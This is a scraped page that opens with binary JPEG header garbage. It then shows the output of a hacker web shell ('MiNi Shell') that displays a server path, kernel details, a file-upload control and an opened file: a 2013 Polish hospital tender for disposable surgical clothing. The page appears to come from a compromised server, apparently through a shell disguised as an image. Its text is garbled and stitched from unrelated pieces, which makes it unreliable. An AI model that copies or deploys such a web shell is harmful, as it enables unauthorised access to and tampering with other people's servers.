JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130725/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130725/295892-N-2013.html

<p class="kh_header"><b>Krotoszyn: Dostawa odzieży jednorazowego użytku dla SPZOZ Krotoszyn.</b><br>
<b>Numer ogłoszenia: 295892 - 2013; data zamieszczenia: 25.07.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej , ul. Młyńska 2, 63-700 Krotoszyn, woj. wielkopolskie, tel. 062 5880390 w. 253, faks 062 5880402.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.spzoz.krotoszyn.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa odzieży jednorazowego użytku dla SPZOZ Krotoszyn..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1  Uniwersalny lekki czepek w formie beretu na gumce zielony   szt. 8 000
2 Czepek chirurgiczny męski wykonany z włókniny polipropylenowej o gramaturze nie mniejszej niż 15g/m2 z podwójną wstawką pochłaniającą pot na całej szerokości czoła, ściągnięty z tyłu lekką gumką. Sposób pakowania w kartoniki max 100 szt. gwarantujący higieniczne przechowywanie i wyjmowanie.   szt. 1 000
3 Czepek chirurgiczny wykonany z włókniny wiskozowej typu printbonded o gramaturze 25g/m2, ściągnięty z tyłu gumką. Pakowany w kartoniki, kolor zielony.   szt. 4 000
4 Czepek chirurgiczny wykonany z włókniny wiskozowej printbonded o gramaturze 25g/m2 część górna wykonana z włókniny polipropylenowej typu spunbonded o gramaturze 18 g/m2.Wiązany na troki, część przednia wydłużona z możliwością wywinięcia. Pakowany w kartonok  w formie podajnika. Kolor zielony.   szt. 2 000
5 Czepek w kształcie hełmu zapewniajacy pełną ochronę ( osłonięta głowa i szyja ) wiązany na troki wokół szyi.   szt. 100
6 Fartuch chirurgiczny niesterylny/pielęgniarski   szt. 1 900
7 Fartuch chirurgiczny sterylny -nieprzemakalne wstawki w przedniej części fartucha i w rękawach z  mankietami bawełnianymi lub z dzianiny, przednie troki łączone kartonikiem - z włókniny bawełnopodobnej   szt. 2 400
8 Folia chirurgiczna 29 x 25 cm  +/- 2 cm   szt. 10
9 Folia chirurgiczna 45 x 55 +/- 2 cm   szt. 150
10 Folia chirurgiczna 56 x 82 cm +/- 2 cm   szt. 150
11 Majtki kolonoskopowe wykonane z włókniny typu SMS niebieskie   szt. 50
12 Maski chirurgiczne   szt. 15 000
13 Podkład - zestaw porodowy   kpl. 300
14 Podkład - zestaw porodowy   kpl. 250
15 Podkład na fotel ginekologiczny nieprzemakalny - podfoliowany  - szerokość 33 cm, z perforacją min. co 36 cm (w rolce 50 mb +/- 1 m )   szt. 400
16 Podkład na kozetkę nieprzemakalny - podfoliowany szerkość od 50 - 51 cm, z perforacją min. co 36 cm,
 ( w rolce  50 mb +/-1 m)   szt. 1 300
17 Podkład - prześcieradło z włokniny polipropylenowej roz. 210 x 140   lub  200 x 150, 210 x 130, 210 x 160   szt. 2 400
18 Pokrowiec sterylny foliowy na przewody do laparoskopu - teleskopowo złożony z taśmami do mocowania na końcowkachwym. 17x 200 cm   szt. 800
19 Serweta operacyjna sterylna 75 x 75-90 cm z włókniny celulozowej laminowanej PE bez otworu   szt. 4 300
20 Serweta operacyjna sterylna 75 x 75-90 cm z włókniny celulozowej laminowanej PE z otworem   szt. 2 500
21 Sterylny pokrowiec na aparaturę RTG, o średnicy 50 cm wykonany z mocnej przezroczystej folii
PE o gramaturze min. 40 g/m2 oraz grubości min. 0,05 mm, ściągnięty wyjątkowo elastyczną gumką umożliwiającą łatwe nałożenie na przyrząd  szt. 120
22 Sterylny pokrowiec na aparaturę RTG, o średnicy 80 cm wykonany z mocnej przezroczystej folii
PE o gramaturze min. 40 g/m2 oraz grubości min. 0,05 mm, ściągnięty wyjątkowo elastyczną gumką umożliwiającą łatwe nałożenie na przyrząd  szt. 250
23 Sterylny zestaw serwet do operacji stawu biodrowego   kpl. 170
24 Sterylny zestaw serwet do operacji stawu kolanowego    kpl. 50
25 Sterylny zestaw serwet uniwersalny   kpl. 500
26 Ubranie operacyjne - niejałowe       kpl. 200
27 Zestaw pościelowy jednorazowy dwuczęściowy
(poszewka na poduszkę + poszewka na kołdrę )   kpl. 900
28 Zestaw do cięcia cesarskiego
   kpl. 200
29 Kieszeń dwukomorowa samoprzylepna ze sztywnikiem rozmiar 2x15x40 do zestawu z poz.28   kpl. 200

Uwaga:           
 poz. 16 dopuszcza się zaoferowanie podkładu na kozetkę od  długości 40 - 80 mb z jednoczesnym odpowiednim przeliczeniem ceny i ilości do 50 mb i 
z zaznaczeniem w kolumnie nazwa artykułu oferowanej długości rolki         
            
 poz.19 i 20 dopuszcza się zooferowanie serwet wykonanych z włókniny polipropylenowej o bardzo wysokiej jakości         
            
 Wymagania stawiane asortymentom z pozycji :           
          
Poz.13 Podkład - zestaw porodowy- Skład zestawu:
a) serweta chirurgiczna do porodu o wymiarach 120 x 120 cm, posiadająca warstwę chłonną o wymiarach 8o x 50 cm. Serweta wyposażona w worek z sitem do przechwytywania płynów o wymiarach 86 x 56 cm, z możliwością podłączenia drenu  rozmiar 120 x 120  szt. 1 , b) serweta - owinięcie noworodka rozmiar 80 x 90 szt. 1 c) reczniki chłonne rozmiar 30 x 40  szt. 2 d) serweta na stolik - ( owinięcie zestawu )  rozmiar 150 x 180  szt.1

          
Poz.14 Podkład - zestaw porodowy- Skład zestawu:
a) foliowy wysoko chłonny podkład  rozmiar 60 x 90  szt. 1 , b) serwety chirurgiczne rozmiar 50 x 60 szt. 2 c ) reczniki (do owinięcia noworodka) ) rozmiar 56 x 80  szt. 2 d) reczniki chłonne rozmiar 18 x 26  szt. 6, e) kompresy włókninowe rozmiar 10 x 10 szt. 20  f) serweta na stolik - ( owinięcie zestawu )  rozmiar 100 x 150  szt.1

          
poz.23 Sterylny zestaw serwet do operacji stawu biodrowego - serweta o wymiarach 200 x 290 cm z wycięciem w kształcie litery U ( 9 x 100 cm ), otoczony taśmą samoprzylepną , ekran anestozjologiczny 150 x 240, pokrowiec na kończynę, trzy tasmy samoprzylepne ,pokrowiec na stolik MAYO 79 x 145 cm, dwa ręczniki wysokochłonne o wym. 30 x 40 cm, serweta owinięcie zestawu.          
          
poz. 24 Obłożenie chirurgiczne przeznaczone do operacji stawu kolanowego - wykonane z chłonnego, wytrzymałego i nieprzemakalnego laminatu. 
Skład obłożenia: a) serweta podstawowa wym. 220 x 320 cm wyposażona w warstwę chłonną oraz samouszczelniający się płat z neoprenu z otworami b) osłona na kończynę o wymiarach 37 x 75 cm ,c) dwie taśmy lepne 10 x 50 cm do mocowania osłony kończyny, d) dwa ręczniki chlonne o wym 30 x 40 cm,  e) serweta o wym. 150  x 180 cm (owinięcie obłożenia), która może służyć jako przykrycie stolika. Pakowane po 4 szt          
          
poz.25 Sterylny zestaw serwet uniwersalny w składzie: a) serweta - ekran anestezjologiczny min. 150 x 200 cm, wykończona tasmą  samoprzylepną  w  środkowej części serwety 1 szt. b) serwety boczne min 75 x 100 cm wykończone taśmą  lepną na całej długości  dłuższego boku - 2 szt c) serweta dolna min. 180 x 175 cm wykończona taśmą - 1szt. d) pokrowiec na stolik Mayo min. 80 x 140 cm - 1 szt e) ściereczki chłonne - 2 szt f) taśmy włókninowe min. 9 x 49 cm  - 1 szt 
g) dwukomorowa kieszeń przylepna (taśma lepna o szerokości min. 5,5 cm) 2 x 15 x 40 cm na ssak i koagulacje - 1 szt  
h) serweta owinięcie min 150 x 200 cm - przykrycie na stolik instrumentalny - 1 szt.           
Asortyment w poz. 23 - 25 zgodny z wymogami:          
Obłożenia(zestawy obłożeń ) operacyjne sterylne  wykonane z włóknin barierowych laminowanych, minimum dwuwarstwowych  1.Odporność na penetrację płynów 
( nieprzemakalność) : => Odporność na penetrację płynów (nieprzemakalność) : => 1000 mm słupa wody  od strony włókniny, oraz  => 2000 mm słupa wody od strony  folii PE.  2. wytrzymałość na rozdarcie/ rozerwanie  na sucho oraz na mokro => 100 kPa  3.Gramatura: min 60 g/m2 (+-5%)  4.Dodatkowe warstwy chłonne ( jeśli występują poz. 2432 )  wokół stref krytycznych obłożeń - włóknina laminowana min dwuwarstwowa - Odporność na penetrację płynów (nieprzemakalność) : => 800 mm słupa wody  od strony włókniny, od strony  folii PE: => 1500 mm słupa wody . Przy gramaturze => 87g/m2 wytrzymałość na rozdarcie/ rozerwanie  na sucho oraz na mokro => 80 kPa. Osłona na stolik 
Mayo - Folia PE o grubości wykonana z mocnej piaskowej folii o grubości 60 mikronów wzocniona w strejie blatu stolika przymocowana na całej powierzchnivwłókniną wiskozową 27g/m2. Ściereczki chłonne będące na wyposażeniu obłożeń oraz fartuchów - gramatura - min 52 g/m2  W przypadku wyrobów sterylnych powinny być gotowe do użycia w warunkach sali operacyjnej z tterminem ważności nie krótszym niż 18 miesięcy.Na opakowaniach zewnętrznych wyrobów sterylnych powinny 
znajdować się 2 samoprzylepne kontrolki umożliwiające powtórne wklejenie do protokołu operacyjnego z z identyfikacją danego wyrobu
Wyroby zgodne z normami PN-EN 13795, 1-3          
W przypadku wyrobów sterylnych powinny być one gotowe do użycia w warunkach sali operacyjnej z terminem ważności nie krótszym niż 18 miesięcy .          
Na opakowaniach zewnętrznych wyrobów sterylnych  powinny znajdować się 2 samoprzylepne kontrolki umożliwiające powtórne wklejenie do protokołu operacyjnego z identyfikacja danego wyrobu.          
          
poz. 28 Zestaw do cięcia cesarskiego wykonany z laminatu minimum 2 warstwowego na całej powierzchni serwet ( warstwa polipropylenu i warstwa polietylenu) o gramaturze minimum 63g/m2.  : Skład zestawu : a) serweta chirurgiczna do cięcia cesarskiego o wymiarach 180 x 300 posiadająca otwów w kształcie trapesu o wymiarach: wysokość 23 c, dolna podstawa 33 cm, górna podstawa 23 cm,wypełniony folią chirurgiczną, posiadająca zintegrowany, okalający worekdo przechwytywania płynów wyposażony w sztywnik i zawór drenażowy rozmiar 180 x 300 szt. 1. b) serweta - owinięcie noworodka rozmiar 80 x 90  szt.1, c) taśma samoprzylepna rozmiar 9 x 49 szt. 1 d) ręczniki chłonne rozmiar 30 x 40 szt 4 e) czerwona osłona na stolik MAYO rozmiar 80x 145 szt.1 f) serweta na stolik - ( owinięcie zestawu ) rozmiar 150 x 200 szt.1          
 UWAGA !          
 1.  Brak wypełnienia kolumny Numer katalogowy i Nazwa handlowa i producent wymaganymi informacjami spowoduje odrzucenie oferty na pdostawie art. 89 ust. 1 pkt 2 Pzp. W przypadku nie stosowania u danego Wykonawcy numeru katalogowego należy zaznaczyć to w formularzu cenowym zapisem np.: nie stosuje. W przypadku, gdy nazwa handlowa zaoferowanych artykułów pokrywa się z nazwą podaną przez Zamawiającego należy wpisać zwrot - Jak u Zamawiającego..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Dostawa odzieży jednorazowego użytku dla SPZOZ Krotoszyn, maksymalnie 20% zamówienia podstawowego.</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 33.19.90.00-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 12.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>

<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Oferta winna zawierać wszystkie dokumenty i oświadczenia wymienione w rozdziale VI niniejszej SIWZ oraz : 
a.	Formularz ofertowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 1.
b.	Formularz cenowy podpisany przez osobę upoważnioną do składania oświadczenia woli w imieniu wykonawcy z wykorzystaniem wzoru - załącznik nr 2. Do oferty należy dołączyć wypełnione Formularze cenowe również w formie elektronicznej (plik.xls) z niezablokowanymi formułami. Formularze cenowe w formie pliku.xls umieszczone są i dostępne do ściągnięcia na stronie internetowej Zamawiającego www.bip.spzoz.krotoszyn.pl .

3.	W przypadku podpisania oferty oraz poświadczenia za zgodność z oryginałem kopii dokumentów przez osobę niewymienioną w dokumencie rejestracyjnym (ewidencyjnym) Wykonawcy, należy do oferty dołączyć stosowne pełnomocnictwo (oryginał lub kopia poświadczona za zgodność z oryginałem przez notariusza).</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>§ 6 Projektu umowy:2.	Strony ustalają możliwość zmiany cen wynikających z okoliczności, których nie można było przewidzieć w chwili zawarcia niniejszej umowy. Za okoliczność taką uważa się :
	-	ustawową zmianę stawek podatku VAT.
3.	W przypadku ustawowej zmiany stawki podatku VAT na przedmiot niniejszego zamówienia, jej zmiana 	następuje z mocy prawa, bez konieczności podpisywania oddzielnego aneksu do umowy. 
§ 13 Projektu umowy:2.	Strony dopuszczają zmiany umowy w zakresie: 
-      numeru katalogowego produktu  (w tym przypadku zmiana może być dokonana na podstawie 	pisemnego powiadomienia Zamawiającego o zmianie numeru katalogowego, bez konieczności 	podpisywania aneksu do umowy, z zaznaczeniem, której pozycji w Formularzu cenowym zmiana 	numeru katalogowego dotyczy).
-        nazwy produktu przy zachowaniu jego parametrów, 
-        sposobu konfekcjonowania,
-        liczby opakowań,
-        wprowadzenia do sprzedaży przez wykonawcę produktu zmodyfikowanego / udoskonalonego,
       -        zmiany liczby badań objętych zapotrzebowaniem Zamawiającego,
       -    przedłużenia terminu realizacji umowy do czasu wykorzystania przedmiotu umowy, do wartości nie   	większej niż całkowita wartość umowy, maksymalnie 12 miesięcy.

Powyższe zmiany nie mogą skutkować zmianą ceny jednostkowej i nie mogą być niekorzystne dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.spzoz.krotoszyn.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Samodzielny Publiczny Zakład Opieki Zdrowotnej ul. Młyńska 2 63-700 Krotoszyn Pokój nr 20..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 05.08.2013 godzina 09:00, miejsce: Samodzielny Publiczny Zakład Opieki Zdrowotnej ul. Młyńska 2 63-700 Krotoszyn Sekretariat pokój nr 1..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com